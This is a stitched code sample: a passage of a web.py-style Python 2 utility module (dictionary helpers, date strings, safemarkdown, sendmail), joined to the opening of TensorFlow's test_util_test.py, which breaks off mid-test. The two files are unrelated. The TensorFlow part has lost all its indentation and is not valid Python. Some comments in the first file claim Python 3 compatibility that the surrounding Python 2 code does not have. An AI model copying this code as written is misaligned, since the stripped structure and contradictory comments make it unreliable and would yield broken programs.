    3
    >>> dictfind(d, 5)
    """
    # .items() works on both Python 2 and 3 (iteritems() is 2.x-only).
    # Note this compares by identity (`is`), matching the original behaviour.
    for (key, value) in dictionary.items():
        if element is value:
            return key
def dictfindall(dictionary, element):
    """
    Returns the keys whose values in `dictionary` are `element`
    or, if none exists, [].
    >>> d = {1:4, 3:4}
    >>> dictfindall(d, 4)
    [1, 3]
    >>> dictfindall(d, 5)
    []
    """
    res = []
    # .items() works on both Python 2 and 3 (iteritems() is 2.x-only).
    # Comparison is by identity (`is`), matching the original behaviour.
    for (key, value) in dictionary.items():
        if element is value:
            res.append(key)
    return res
def dictincr(dictionary, element):
    """
    Increments `element` in `dictionary`,
    setting it to one if it doesn't exist.
    >>> d = {1:2, 3:4}
    >>> dictincr(d, 1)
    3
    >>> d[1]
    3
    >>> dictincr(d, 5)
    1
    >>> d[5]
    1
    """
    count = dictionary.get(element, 0) + 1
    dictionary[element] = count
    return count
def dictadd(*dicts):
    """
    Returns a dictionary consisting of the keys in the argument dictionaries.
    If they share a key, the value from the last argument is used.
    >>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
    {1: 0, 2: 1, 3: 1}
    """
    merged = {}
    for mapping in dicts:
        # Later arguments overwrite earlier ones on key collisions.
        merged.update(mapping)
    return merged
def listget(lst, ind, default=None):
    """
    Returns `lst[ind]` if it exists, `default` otherwise.
    >>> listget(['a'], 0)
    'a'
    >>> listget(['a'], 1)
    >>> listget(['a'], 1, 'b')
    'b'
    """
    # Only indexes past the end fall back to the default; negative indexes
    # are passed through unchecked (as in plain list indexing).
    if ind > len(lst) - 1:
        return default
    return lst[ind]
def intget(integer, default=None):
    """
    Returns `integer` as an int or `default` if it can't.
    >>> intget('3')
    3
    >>> intget('3a')
    >>> intget('3a', 0)
    0
    """
    try:
        return int(integer)
    except (TypeError, ValueError):
        # TypeError covers None/unconvertible types; ValueError covers bad strings.
        return default
def datestr(then, now=None):
    """
    Converts a (UTC) datetime object to a nice string representation.
    >>> from datetime import datetime, timedelta
    >>> d = datetime(1970, 5, 1)
    >>> datestr(d, now=d)
    '0 microseconds ago'
    >>> for t, v in {
    ...   timedelta(microseconds=1): '1 microsecond ago',
    ...   timedelta(microseconds=2): '2 microseconds ago',
    ...   -timedelta(microseconds=1): '1 microsecond from now',
    ...   -timedelta(microseconds=2): '2 microseconds from now',
    ...   timedelta(microseconds=2000): '2 milliseconds ago',
    ...   timedelta(seconds=2): '2 seconds ago',
    ...   timedelta(seconds=2*60): '2 minutes ago',
    ...   timedelta(seconds=2*60*60): '2 hours ago',
    ...   timedelta(days=2): '2 days ago',
    ... }.iteritems():
    ...     assert datestr(d, now=d+t) == v
    >>> datestr(datetime(1970, 1, 1), now=d)
    'January 1'
    >>> datestr(datetime(1969, 1, 1), now=d)
    'January 1, 1969'
    >>> datestr(datetime(1970, 6, 1), now=d)
    'June 1, 1970'
    """
    def agohence(n, what, divisor=None):
        # Render "<N> <unit>s ago" / "<N> <unit>s from now".
        if divisor: n = n // divisor
        out = str(abs(n)) + ' ' + what # '2 day'
        if abs(n) != 1: out += 's' # '2 days'
        out += ' ' # '2 days '
        if n < 0:
            out += 'from now'
        else:
            out += 'ago'
        return out # '2 days ago'
    oneday = 24 * 60 * 60
    if not now: now = datetime.datetime.utcnow()
    if type(now).__name__ == "DateTime":
        # Tolerate mx.DateTime-style objects by converting via timestamp.
        now = datetime.datetime.fromtimestamp(now)
    if type(then).__name__ == "DateTime":
        then = datetime.datetime.fromtimestamp(then)
    delta = now - then
    deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
    deltadays = abs(deltaseconds) // oneday
    if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
    if deltadays:
        if abs(deltadays) < 4:
            return agohence(deltadays, 'day')
        # %e is day-of-month without a leading zero (platform-dependent format code).
        out = then.strftime('%B %e') # e.g. 'June 13'
        if then.year != now.year or deltadays < 0:
            # Append the year for other years and for future dates.
            out += ', %s' % then.year
        return out
    if int(deltaseconds):
        if abs(deltaseconds) > (60 * 60):
            return agohence(deltaseconds, 'hour', 60 * 60)
        elif abs(deltaseconds) > 60:
            return agohence(deltaseconds, 'minute', 60)
        else:
            return agohence(deltaseconds, 'second')
    deltamicroseconds = delta.microseconds
    if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
    if abs(deltamicroseconds) > 1000:
        return agohence(deltamicroseconds, 'millisecond', 1000)
    return agohence(deltamicroseconds, 'microsecond')
def numify(string):
    """
    Removes all non-digit characters from `string`.
    >>> numify('800-555-1212')
    '8005551212'
    >>> numify('800.555.1212')
    '8005551212'
    """
    return ''.join(c for c in str(string) if c.isdigit())
def denumify(string, pattern):
    """
    Formats `string` according to `pattern`, where the letter X gets replaced
    by characters from `string`.
    >>> denumify("8005551212", "(XXX) XXX-XXXX")
    '(800) 555-1212'
    """
    out = []
    pos = 0  # next unconsumed character of `string`
    for c in pattern:
        if c == "X":
            # Advance an index instead of re-slicing `string` each time,
            # which was accidentally O(n**2).
            out.append(string[pos])
            pos += 1
        else:
            out.append(c)
    return ''.join(out)
def commify(n):
    """
    Add commas to an integer `n`.
    >>> commify(1)
    '1'
    >>> commify(123)
    '123'
    >>> commify(1234)
    '1,234'
    >>> commify(1234567890)
    '1,234,567,890'
    >>> commify(None)
    >>>
    """
    if n is None:
        return None
    pieces = []
    # Walk the digits right-to-left, appending a comma before every
    # group of three, then flip the result back.
    for i, c in enumerate(reversed(str(n))):
        if i and i % 3 == 0:
            pieces.append(',')
        pieces.append(c)
    return ''.join(reversed(pieces))
def dateify(datestring):
    """
    Format a numified timestamp string as ``XXXX-XX-XX XX:XX:XX``.
    """
    return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
    """
    Formats an ordinal.
    Doesn't handle negative numbers.
    >>> nthstr(1)
    '1st'
    >>> nthstr(0)
    '0th'
    >>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
    ['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
    >>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
    ['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
    >>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
    ['111th', '112th', '113th', '114th', '115th']
    """
    assert n >= 0
    # 11/12/13 are special-cased: 'th' despite ending in 1/2/3.
    if n % 100 in (11, 12, 13):
        return '%sth' % n
    suffix = {1: 'st', 2: 'nd', 3: 'rd'}.get(n % 10, 'th')
    return '%s%s' % (n, suffix)
def cond(predicate, consequence, alternative=None):
    """
    Function replacement for if-else to use in expressions.
    >>> x = 2
    >>> cond(x % 2 == 0, "even", "odd")
    'even'
    >>> cond(x % 2 == 0, "even", "odd") + '_row'
    'even_row'
    """
    # Guard-clause form of the original if/else.
    if not predicate:
        return alternative
    return consequence
class CaptureStdout:
    """
    Captures everything `func` prints to stdout and returns it instead.
    >>> def idiot():
    ...     print "foo"
    >>> capturestdout(idiot)()
    'foo\\n'
    **WARNING:** Not threadsafe!
    """
    def __init__(self, func):
        self.func = func
    def __call__(self, *args, **keywords):
        from cStringIO import StringIO
        # Not threadsafe! sys.stdout is swapped process-wide.
        out = StringIO()
        oldstdout = sys.stdout
        sys.stdout = out
        try:
            self.func(*args, **keywords)
        finally:
            # Always restore the real stdout, even when func raises.
            sys.stdout = oldstdout
        return out.getvalue()
capturestdout = CaptureStdout
class Profile:
    """
    Profiles `func` and returns a tuple containing its output
    and a string with human-readable profiling information.
    >>> import time
    >>> out, inf = profile(time.sleep)(.001)
    >>> out
    >>> inf[:10].strip()
    'took 0.0'
    """
    def __init__(self, func):
        self.func = func
    def __call__(self, *args): ##, **kw): kw unused
        # NOTE: hotshot is a Python 2-only profiler module.
        import hotshot, hotshot.stats, tempfile ##, time already imported
        temp = tempfile.NamedTemporaryFile()
        prof = hotshot.Profile(temp.name)
        # Wall-clock the call while the profiler records it.
        stime = time.time()
        result = prof.runcall(self.func, *args)
        stime = time.time() - stime
        prof.close()
        import cStringIO
        out = cStringIO.StringIO()
        stats = hotshot.stats.load(temp.name)
        stats.stream = out  # redirect the stats report into the buffer
        stats.strip_dirs()
        stats.sort_stats('time', 'calls')
        stats.print_stats(40)
        stats.print_callers()
        x = '\n\ntook '+ str(stime) + ' seconds\n'
        x += out.getvalue()
        return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3: backfill traceback.format_exc
if not hasattr(traceback, 'format_exc'):
    from cStringIO import StringIO
    def format_exc(limit=None):
        # Build the traceback text by printing into an in-memory buffer.
        strbuf = StringIO()
        traceback.print_exc(limit, strbuf)
        return strbuf.getvalue()
    traceback.format_exc = format_exc
def tryall(context, prefix=None):
    """
    Tries a series of functions and prints their results.
    `context` is a dictionary mapping names to values;
    the value will only be tried if it's callable.
    >>> tryall(dict(j=lambda: True))
    j: True
    ----------------------------------------
    results:
       True: 1
    For example, you might have a file `test/stuff.py`
    with a series of functions testing various things in it.
    At the bottom, have a line:
        if __name__ == "__main__": tryall(globals())
    Then you can run `python test/stuff.py` and get the results of
    all the tests.
    """
    context = context.copy() # vars() would update
    results = {}  # tally of result values (and 'ERROR') across all calls
    for (key, value) in context.iteritems():
        if not hasattr(value, '__call__'):
            continue
        if prefix and not key.startswith(prefix):
            continue
        print key + ':',
        try:
            r = value()
            dictincr(results, r)
            print r
        except:
            # Report the failure but keep running the remaining functions.
            print 'ERROR'
            dictincr(results, 'ERROR')
            print '   ' + '\n   '.join(traceback.format_exc().split('\n'))
    print '-'*40
    print 'results:'
    for (key, value) in results.iteritems():
        print ' '*2, str(key)+':', value
class ThreadedDict:
    """
    Thread local storage.
    >>> d = ThreadedDict()
    >>> d.x = 1
    >>> d.x
    1
    >>> import threading
    >>> def f(): d.x = 2
    >>> t = threading.Thread(target=f)
    >>> t.start()
    >>> t.join()
    >>> d.x
    1
    """
    def __getattr__(self, key):
        return getattr(self._getd(), key)
    def __setattr__(self, key, value):
        return setattr(self._getd(), key, value)
    def __delattr__(self, key):
        return delattr(self._getd(), key)
    def __hash__(self):
        # Identity hash so each instance gets its own slot in t._d below.
        return id(self)
    def _getd(self):
        t = threading.currentThread()
        if not hasattr(t, '_d'):
            # using __dict__ of thread as thread local storage
            t._d = {}
        # there could be multiple instances of ThreadedDict.
        # use self as key
        # NOTE(review): entries are never evicted, so every instance stays
        # reachable for the thread's lifetime -- confirm this is acceptable.
        if self not in t._d:
            t._d[self] = storage()
        return t._d[self]
threadeddict = ThreadedDict
def autoassign(self, locals):
    """
    Automatically assigns local variables to `self`.
    >>> self = storage()
    >>> autoassign(self, dict(a=1, b=2))
    >>> self
    <Storage {'a': 1, 'b': 2}>
    Generally used in `__init__` methods, as in:
        def __init__(self, foo, bar, baz=1): autoassign(self, locals())
    """
    # .items() works on both Python 2 and 3 (iteritems() is 2.x-only).
    for (key, value) in locals.items():
        if key == 'self':
            continue  # don't set self.self
        setattr(self, key, value)
def to36(q):
    """
    Converts an integer to base 36 (a useful scheme for human-sayable IDs).
    >>> to36(35)
    'z'
    >>> to36(119292)
    '2k1o'
    >>> int(to36(939387374), 36)
    939387374
    >>> to36(0)
    '0'
    >>> to36(-393)
    Traceback (most recent call last):
        ...
    ValueError: must supply a positive integer
    """
    # Call form of raise works on both Python 2 and 3.
    if q < 0: raise ValueError("must supply a positive integer")
    letters = "0123456789abcdefghijklmnopqrstuvwxyz"
    converted = []
    while q != 0:
        q, r = divmod(q, 36)
        converted.insert(0, letters[r])  # build most-significant digit first
    return "".join(converted) or '0'
# Matches bare http:// URLs not already preceded by '(' (i.e. not inside
# existing markdown link syntax).
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
    """
    Converts text to HTML following the rules of Markdown, but blocking any
    outside HTML input, so that only the things supported by Markdown
    can be used. Also converts raw URLs to links.
    (requires [markdown.py](http://webpy.org/markdown.py))
    """
    from markdown import markdown
    if text:
        # BUG FIX: escape raw '<' as '&lt;' so inline HTML is neutralised;
        # the previous replace('<', '<') was a no-op (the entity had been
        # lost to an HTML-unescaping error) and defeated the whole point
        # of "safe" markdown.
        text = text.replace('<', '&lt;')
        # TODO: automatically get page title?
        text = r_url.sub(r'<\1>', text)
        text = markdown(text)
        return text
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
    """
    Sends the email message `message` with mail and envelope headers
    for from `from_address` to `to_address` with `subject`.
    Additional email headers can be specified with the dictionary
    `headers`; extra recipients with the `cc` and `bcc` keyword arguments.
    If `web.config.smtp_server` is set, it will send the message
    to that SMTP server. Otherwise it will look for
    `/usr/sbin/sendmail`, the typical location for the sendmail-style
    binary. To use sendmail from a different path, set `web.config.sendmail_path`.
    """
    try:
        import webapi
    except ImportError:
        # Stand-alone use without web.py: empty config.
        webapi = Storage(config=Storage())
    if headers is None: headers = {}
    cc = kw.get('cc', [])
    bcc = kw.get('bcc', [])
    def listify(x):
        # Normalise a scalar-or-list of addresses into a list of strings.
        if not isinstance(x, list):
            return [safestr(x)]
        else:
            return [safestr(a) for a in x]
    from_address = safestr(from_address)
    to_address = listify(to_address)
    cc = listify(cc)
    bcc = listify(bcc)
    recipients = to_address + cc + bcc
    # Caller-supplied headers win over the defaults (dictadd keeps the last).
    headers = dictadd({
      'MIME-Version': '1.0',
      'Content-Type': 'text/plain; charset=UTF-8',
      'Content-Disposition': 'inline',
      'From': from_address,
      'To': ", ".join(to_address),
      'Subject': subject
    }, headers)
    if cc:
        headers['Cc'] = ", ".join(cc)
    import email.Utils
    # Reduce display forms ("Name <a@b>") to bare envelope addresses.
    from_address = email.Utils.parseaddr(from_address)[1]
    recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
    message = ('\n'.join([safestr('%s: %s' % x) for x in headers.iteritems()])
      + "\n\n" + safestr(message))
    if webapi.config.get('smtp_server'):
        server = webapi.config.get('smtp_server')
        port = webapi.config.get('smtp_port', 0)
        username = webapi.config.get('smtp_username')
        password = webapi.config.get('smtp_password')
        debug_level = webapi.config.get('smtp_debuglevel', None)
        starttls = webapi.config.get('smtp_starttls', False)
        import smtplib
        smtpserver = smtplib.SMTP(server, port)
        if debug_level:
            smtpserver.set_debuglevel(debug_level)
        if starttls:
            # RFC 3207: EHLO both before and after upgrading to TLS.
            smtpserver.ehlo()
            smtpserver.starttls()
            smtpserver.ehlo()
        if username and password:
            smtpserver.login(username, password)
        smtpserver.sendmail(from_address, recipients, message)
        smtpserver.quit()
    else:
        sendmail_path = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
        # Leading '-' in an address would be parsed as a sendmail option.
        assert not from_address.startswith('-'), 'security'
        for r in recipients:
            assert not r.startswith('-'), 'security'
        if subprocess:
            # BUG FIX: honour the configured sendmail_path; this branch
            # previously hard-coded '/usr/sbin/sendmail'.
            p = subprocess.Popen([sendmail_path, '-f', from_address] + recipients, stdin=subprocess.PIPE)
            p.stdin.write(message)
            p.stdin.close()
            p.wait()
        else:
            # BUG FIX: likewise, this fallback previously hard-coded
            # '/usr/lib/sendmail', ignoring sendmail_path entirely.
            i, o = os.popen2([sendmail_path, '-f', from_address] + recipients)
            i.write(message)
            i.close()
            o.close()
            del i, o
if __name__ == "__main__":
    # Run the embedded doctests when this module is executed directly.
    import doctest
    doctest.testmod()
|
test_util_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
@test_util.run_deprecated_v1
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
@test_util.run_deprecated_v1
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsBuiltWithROCm(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsBuiltWithROCm():
print("Tensorflow build has ROCm support")
else:
print("Tensorflow build does not have ROCm support")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseList(self):
with self.assertRaisesRegexp(AssertionError, r"not close dif"):
self.assertAllClose([0], [1])
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegexp(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
@test_util.skip_if(True) # b/117665998
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
with self.assertRaisesRegexp(AssertionError, r"not equal lhs"):
self.assertAllEqual([0] * 3, k)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
